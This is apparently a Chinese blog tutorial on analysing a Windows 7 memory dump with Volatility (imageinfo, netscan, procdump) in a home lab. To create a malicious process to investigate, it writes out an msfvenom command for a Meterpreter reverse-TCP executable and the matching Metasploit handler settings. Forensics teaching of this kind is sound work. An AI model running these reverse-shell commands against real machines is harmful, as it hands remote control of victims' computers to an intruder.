使用Volatility进行简单的内存分析

  • A+

Volatility下载地址
https://www.volatilityfoundation.org/releases
Dumplt下载地址
http://www.secist.com/wp-content/uploads/2016/11/DumpIt.zip
因为一次应急响应,大佬针对受害主机内存进行了详细的分析,所以我就萌生了浮现一遍分析过程的想法。
攻击机IP地址192.168.234.140(kali)
靶机IP地址 192.168.234.141(win7)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.140 lport=4433 -f exe -o shell.exe
首先生成一个恶意反连文件

10.png
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.234.140
set LPORT 4433
exploit

11.png
这时候需要将恶意文件拷贝到靶机中运行
然后使用dumplt 生成.raw文件(这里内存有多大生成的文件就有多大)

12.png
接下来就是使用Volatility针对该文件进行分析
(PS:不是我不用kali是里面的装不好)

13.png
使用imageinfo识别应该使用的配置文件
识别出来的Win7SP1x64符合靶机情况

14.png
使用netscan查看内存中进程的网络连接情况

15.jpg
进程号2864有明显的外连行为
使用procdump对该进程dump

16.jpg
刚dump一瞬间就触发了windows defender告警
将文件放到https://www.virustotal.com/上识别

17.jpg
将文件使用IDA分析

18.png
这就完成了简单的内存分析,我只是个小菜鸟,希望以后每次应急都有新的收获。
PS:再提一下使用ms17-010正在进行攻击的时候内存dump是检查不到恶意进程的

相关推荐: Wordpress 插件命令执行

环境搭建 利用 phpstudy 搭建 wordpress ,http://wordpress.test/wp-admin/plugin-install.php 将解压一次后的漏洞插件压缩包上传并启用插件。 File Manager插件6.0版本 漏洞利用 这…